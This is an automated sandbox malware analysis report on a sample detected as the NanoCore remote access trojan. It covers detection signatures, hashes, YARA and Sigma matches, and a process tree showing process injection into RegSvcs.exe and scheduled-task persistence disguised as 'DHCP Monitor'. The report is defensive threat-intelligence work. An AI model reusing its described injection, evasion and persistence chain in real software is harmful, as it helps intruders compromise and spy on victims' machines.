Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report dUzAkYsvl8.exe

Overview

General Information

Sample Name:dUzAkYsvl8.exe
Analysis ID:500304
MD5:9a4a8643db95a8c0fe52af8675a5d1b1
SHA1:c6beb75cbc168f9224ace74c0dcfb29df6197e82
SHA256:b4e2d864ec03943310548bfbc963a0848bd08e088429c5ce05759face5d380d2
Tags:exeNanoCoreRAT
Infos:

Most interesting Screenshot:

Detection

Nanocore
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Sigma detected: NanoCore
Detected Nanocore Rat
Yara detected AntiVM autoit script
Yara detected Nanocore RAT
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Connects to many ports of the same IP (likely port scanning)
Machine Learning detection for sample
Allocates memory in foreign processes
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Hides that the sample has been downloaded from the Internet (zone.identifier)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses dynamic DNS services
Drops PE files with a suspicious file extension
Writes to foreign memory regions
Protects its processes via BreakOnTermination flag
Machine Learning detection for dropped file
Antivirus or Machine Learning detection for unpacked file
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality to simulate keystroke presses
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
OS version to string mapping found (often used in BOTs)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Contains functionality to retrieve information about pressed keystrokes
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to shutdown / reboot the system
Contains functionality to execute programs as a different user
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Contains functionality to communicate with device drivers
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
Installs a raw input device (often for capturing keystrokes)
File is packed with WinRar
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Detected TCP or UDP traffic on non-standard ports
Contains functionality to launch a program with higher privileges
Potential key logger detected (key state polling based)
Contains functionality to simulate mouse events
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Classification

Process Tree

  • System is w10x64
  • dUzAkYsvl8.exe (PID: 6428 cmdline: 'C:\Users\user\Desktop\dUzAkYsvl8.exe' MD5: 9A4A8643DB95A8C0FE52AF8675A5D1B1)
    • cjlaro.pif (PID: 5028 cmdline: 'C:\Users\user\77066510\cjlaro.pif' txoxpdjc.qnr MD5: 279DAE7236F5F2488A4BACDE6027F730)
      • RegSvcs.exe (PID: 6364 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe MD5: 2867A3817C9245F7CF518524DFD18F28)
        • schtasks.exe (PID: 5252 cmdline: 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp1EC2.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)
          • conhost.exe (PID: 6612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • schtasks.exe (PID: 1240 cmdline: 'schtasks.exe' /create /f /tn 'DHCP Monitor Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp2720.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)
          • conhost.exe (PID: 6432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cjlaro.pif (PID: 2132 cmdline: 'C:\Users\user\77066510\cjlaro.pif' C:\Users\user\77066510\txoxpdjc.qnr MD5: 279DAE7236F5F2488A4BACDE6027F730)
  • RegSvcs.exe (PID: 6748 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe 0 MD5: 2867A3817C9245F7CF518524DFD18F28)
    • conhost.exe (PID: 6828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • dhcpmon.exe (PID: 6836 cmdline: 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' 0 MD5: 2867A3817C9245F7CF518524DFD18F28)
    • conhost.exe (PID: 6816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cjlaro.pif (PID: 7152 cmdline: 'C:\Users\user\77066510\cjlaro.pif' C:\Users\user\77066510\txoxpdjc.qnr MD5: 279DAE7236F5F2488A4BACDE6027F730)
    • RegSvcs.exe (PID: 3676 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe MD5: 2867A3817C9245F7CF518524DFD18F28)
  • wscript.exe (PID: 3460 cmdline: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\77066510\Update.vbs' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
    • cjlaro.pif (PID: 3016 cmdline: 'C:\Users\user\77066510\cjlaro.pif' C:\Users\user\77066510\txoxpdjc.qnr MD5: 279DAE7236F5F2488A4BACDE6027F730)
    • cjlaro.pif (PID: 4504 cmdline: 'C:\Users\user\77066510\cjlaro.pif' C:\Users\user\77066510\txoxpdjc.qnr MD5: 279DAE7236F5F2488A4BACDE6027F730)
      • RegSvcs.exe (PID: 4968 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe MD5: 2867A3817C9245F7CF518524DFD18F28)
  • dhcpmon.exe (PID: 4580 cmdline: 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' MD5: 2867A3817C9245F7CF518524DFD18F28)
    • conhost.exe (PID: 6624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.560410383.0000000006110000.00000004.00020000.sdmpNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
  • 0xe75:$x1: NanoCore.ClientPluginHost
  • 0xe8f:$x2: IClientNetworkHost
00000005.00000002.560410383.0000000006110000.00000004.00020000.sdmpNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
  • 0xe75:$x2: NanoCore.ClientPluginHost
  • 0x1261:$s3: PipeExists
  • 0x1136:$s4: PipeCreated
  • 0xeb0:$s5: IClientLoggingHost
0000001B.00000003.383284019.000000000478A000.00000004.00000001.sdmpNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
  • 0xfddd:$x1: NanoCore.ClientPluginHost
  • 0xfe1a:$x2: IClientNetworkHost
  • 0x1394d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0000001B.00000003.383284019.000000000478A000.00000004.00000001.sdmpJoeSecurity_NanocoreYara detected Nanocore RATJoe Security
    0000001B.00000003.383284019.000000000478A000.00000004.00000001.sdmpNanoCoreunknown Kevin Breen <kevin@techanarchy.net>
    • 0xfb45:$a: NanoCore
    • 0xfb55:$a: NanoCore
    • 0xfd89:$a: NanoCore
    • 0xfd9d:$a: NanoCore
    • 0xfddd:$a: NanoCore
    • 0xfba4:$b: ClientPlugin
    • 0xfda6:$b: ClientPlugin
    • 0xfde6:$b: ClientPlugin
    • 0xfccb:$c: ProjectData
    • 0x106d2:$d: DESCrypto
    • 0x1809e:$e: KeepAlive
    • 0x1608c:$g: LogClientMessage
    • 0x12287:$i: get_Connected
    • 0x10a08:$j: #=q
    • 0x10a38:$j: #=q
    • 0x10a54:$j: #=q
    • 0x10a84:$j: #=q
    • 0x10aa0:$j: #=q
    • 0x10abc:$j: #=q
    • 0x10aec:$j: #=q
    • 0x10b08:$j: #=q
    Click to see the 180 entries

    Unpacked PEs

    SourceRuleDescriptionAuthorStrings
    5.2.RegSvcs.exe.2a67f10.2.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
    • 0x40a6:$x1: NanoCore.ClientPluginHost
    5.2.RegSvcs.exe.2a67f10.2.unpackNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
    • 0x40a6:$x2: NanoCore.ClientPluginHost
    • 0x4184:$s4: PipeCreated
    • 0x40c0:$s5: IClientLoggingHost
    5.2.RegSvcs.exe.3a807ce.3.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
    • 0x4083:$x1: NanoCore.ClientPluginHost
    5.2.RegSvcs.exe.3a807ce.3.unpackNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
    • 0x4083:$x2: NanoCore.ClientPluginHost
    • 0x4161:$s4: PipeCreated
    • 0x409d:$s5: IClientLoggingHost
    20.3.cjlaro.pif.48ce458.0.raw.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
    • 0x1018d:$x1: NanoCore.ClientPluginHost
    • 0x101ca:$x2: IClientNetworkHost
    • 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
    Click to see the 118 entries

    Sigma Overview

    AV Detection:

    barindex
    Sigma detected: NanoCoreShow sources
    Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ProcessId: 6364, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

    E-Banking Fraud:

    barindex
    Sigma detected: NanoCoreShow sources
    Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ProcessId: 6364, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

    System Summary:

    barindex
    Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper ArgumentsShow sources
    Source: Process startedAuthor: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth, Christian Burkard: Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ParentCommandLine: 'C:\Users\user\77066510\cjlaro.pif' txoxpdjc.qnr, ParentImage: C:\Users\user\77066510\cjlaro.pif, ParentProcessId: 5028, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ProcessId: 6364
    Sigma detected: Possible Applocker BypassShow sources
    Source: Process startedAuthor: juju4: Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ParentCommandLine: 'C:\Users\user\77066510\cjlaro.pif' txoxpdjc.qnr, ParentImage: C:\Users\user\77066510\cjlaro.pif, ParentProcessId: 5028, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ProcessId: 6364

    Stealing of Sensitive Information:

    barindex
    Sigma detected: NanoCoreShow sources
    Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ProcessId: 6364, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

    Remote Access Functionality:

    barindex
    Sigma detected: NanoCoreShow sources
    Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ProcessId: 6364, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

    Jbx Signature Overview

    Click to jump to signature section

    Show All Signature Results

    AV Detection:

    barindex
    Yara detected Nanocore RATShow sources
    Source: Yara matchFile source: 20.3.cjlaro.pif.48ce458.0.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 20.3.cjlaro.pif.4902870.9.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 20.3.cjlaro.pif.496b880.5.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 4.3.cjlaro.pif.4e6e068.2.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 4.3.cjlaro.pif.4ed7078.1.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 5.2.RegSvcs.exe.500000.0.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 5.2.RegSvcs.exe.3a807ce.3.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 5.2.RegSvcs.exe.61b0000.8.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 20.3.cjlaro.pif.496b880.6.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 20.3.cjlaro.pif.496b880.5.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 5.2.RegSvcs.exe.61b4629.9.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 20.3.cjlaro.pif.4902870.4.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 20.3.cjlaro.pif.4902870.4.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 20.3.cjlaro.pif.4902870.8.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 4.3.cjlaro.pif.4e05058.0.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 4.3.cjlaro.pif.4ed7078.1.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 20.3.cjlaro.pif.496b880.6.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 20.3.cjlaro.pif.4902870.7.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 5.2.RegSvcs.exe.61b0000.8.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 20.3.cjlaro.pif.4902870.7.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 5.2.RegSvcs.exe.3a8b041.5.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 20.3.cjlaro.pif.4902870.8.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 20.3.cjlaro.pif.4899c50.2.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 5.2.RegSvcs.exe.3a8560b.4.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 4.3.cjlaro.pif.4e6e068.2.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 20.3.cjlaro.pif.4902870.9.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 5.2.RegSvcs.exe.3a8b041.5.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 20.3.cjlaro.pif.4865448.3.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 20.3.cjlaro.pif.4899c50.1.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 0000001B.00000003.383284019.000000000478A000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000004.00000003.315424551.0000000004EA3000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000005.00000002.555314514.0000000000502000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000014.00000003.359982101.00000000048CF000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000014.00000003.363952559.00000000048CF000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000001B.00000003.383566865.00000000047F3000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000001B.00000003.385418574.0000000004828000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000014.00000003.363022584.0000000004938000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000014.00000003.360137256.000000000489A000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000019.00000002.390692877.0000000000F62000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000004.00000003.314549221.0000000004D88000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000001B.00000003.386694211.0000000004721000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000004.00000003.315994973.0000000004E6E000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000014.00000003.364780852.000000000489A000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000001B.00000003.386537145.00000000047F2000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000019.00000002.391670186.0000000003411000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000001B.00000003.383169195.00000000047BF000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000001B.00000003.385532540.00000000010C3000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000019.00000002.391832360.0000000004419000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000004.00000003.316144236.0000000004E6E000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000014.00000003.360433850.0000000004903000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000005.00000002.560490990.00000000061B0000.00000004.00020000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000014.00000003.360821611.000000000496B000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000004.00000003.314585596.0000000004E06000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000004.00000003.315927794.0000000004E06000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000005.00000002.559058243.0000000003A79000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000001B.00000003.386511135.000000000478A000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000004.00000003.316303784.0000000004DD1000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000001B.00000003.383645453.000000000485B000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000014.00000003.366099101.0000000004902000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000004.00000003.315764008.0000000004E3A000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000014.00000003.370237585.0000000004831000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000001B.00000003.386616181.0000000004756000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000001B.00000003.383202245.0000000004721000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000001B.00000003.383407849.00000000047BF000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000014.00000003.369728872.0000000004866000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000014.00000003.363076349.00000000039E5000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000004.00000003.316393189.0000000004D88000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000001E.00000002.406011428.0000000000D02000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000014.00000003.360037831.0000000004831000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000001B.00000003.383348180.0000000004756000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000004.00000003.314529331.0000000004E3A000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000014.00000003.360563466.0000000004903000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000014.00000003.360697455.0000000004938000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000004.00000003.314683885.0000000004EA3000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000004.00000003.314613880.0000000004DD1000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000005.00000002.557771680.0000000002A31000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000014.00000003.366655070.0000000004902000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000004.00000003.314455197.0000000004DD1000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000001B.00000003.383504563.00000000047F3000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000014.00000003.360273834.0000000004866000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000001E.00000002.411732283.00000000033A1000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000001B.00000003.386566314.00000000047F2000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000014.00000003.360354824.00000000048CF000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000001B.00000003.386381872.00000000047BF000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000001E.00000002.412114966.00000000043A9000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000001B.00000003.383082558.0000000004756000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000014.00000003.359604202.0000000004866000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000001B.00000003.383597669.0000000004828000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: Process Memory Space: cjlaro.pif PID: 5028, type: MEMORYSTR
    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 6364, type: MEMORYSTR
    Source: Yara matchFile source: Process Memory Space: cjlaro.pif PID: 7152, type: MEMORYSTR
    Multi AV Scanner detection for submitted fileShow sources
    Source: dUzAkYsvl8.exeVirustotal: Detection: 52%Perma Link
    Source: dUzAkYsvl8.exeReversingLabs: Detection: 55%
    Multi AV Scanner detection for dropped fileShow sources
    Source: C:\Users\user\77066510\cjlaro.pifMetadefender: Detection: 37%Perma Link
    Source: C:\Users\user\77066510\cjlaro.pifReversingLabs: Detection: 55%
    Machine Learning detection for sampleShow sources
    Source: dUzAkYsvl8.exeJoe Sandbox ML: detected
    Machine Learning detection for dropped fileShow sources
    Source: C:\Users\user\77066510\cjlaro.pifJoe Sandbox ML: detected
    Source: 5.2.RegSvcs.exe.500000.0.unpackAvira: Label: TR/Dropper.MSIL.Gen7
    Source: 5.2.RegSvcs.exe.61b0000.8.unpackAvira: Label: TR/NanoCore.fadte
    Source: dUzAkYsvl8.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
    Source: dUzAkYsvl8.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
    Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: dUzAkYsvl8.exe, 00000000.00000000.289072563.0000000000222000.00000002.00020000.sdmp
    Source: Binary string: RegSvcs.pdb, source: dhcpmon.exe, 00000010.00000002.347719934.0000000000D32000.00000002.00020000.sdmp
    Source: Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\NanoProtectPlugin\NanoProtectClient\obj\Debug\NanoProtectClient.pdb source: RegSvcs.exe, 00000005.00000002.559058243.0000000003A79000.00000004.00000001.sdmp
    Source: Binary string: RegSvcs.pdb source: dhcpmon.exe
    Source: C:\Users\user\Desktop\dUzAkYsvl8.exeCode function: 0_2_001FA307 FindFirstFileW,FindFirstFileW,FindFirstFileW,GetLastError,0_2_001FA307
    Source: C:\Users\user\Desktop\dUzAkYsvl8.exeCode function: 0_2_0020AFB9 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_0020AFB9
    Source: C:\Users\user\Desktop\dUzAkYsvl8.exeCode function: 0_2_00219FD3 FindFirstFileExA,0_2_00219FD3
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 4_2_0116399B GetFileAttributesW,FindFirstFileW,FindClose,4_2_0116399B
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 4_2_01182408 FindFirstFileW,LdrInitializeThunk,Sleep,FindNextFileW,FindClose,4_2_01182408
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 4_2_0117280D FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,4_2_0117280D
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 4_2_011A8877 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,4_2_011A8877
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 4_2_01161A73 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,4_2_01161A73
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 4_2_0118CAE7 FindFirstFileW,FindNextFileW,FindClose,4_2_0118CAE7
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 4_2_0117BCB3 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,4_2_0117BCB3
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 4_2_0117BF17 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,4_2_0117BF17
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 4_2_0118DE7C FindFirstFileW,FindClose,4_2_0118DE7C
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 10_2_01182408 FindFirstFileW,Sleep,FindNextFileW,FindClose,10_2_01182408
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 10_2_0116399B GetFileAttributesW,FindFirstFileW,FindClose,10_2_0116399B
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 10_2_0117280D FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_0117280D
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 10_2_011A8877 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,10_2_011A8877
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 10_2_01161A73 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_01161A73
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 10_2_0118CAE7 FindFirstFileW,FindNextFileW,FindClose,10_2_0118CAE7
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 10_2_0117BCB3 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,10_2_0117BCB3
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 10_2_0117BF17 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,10_2_0117BF17
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 10_2_0118DE7C FindFirstFileW,FindClose,10_2_0118DE7C
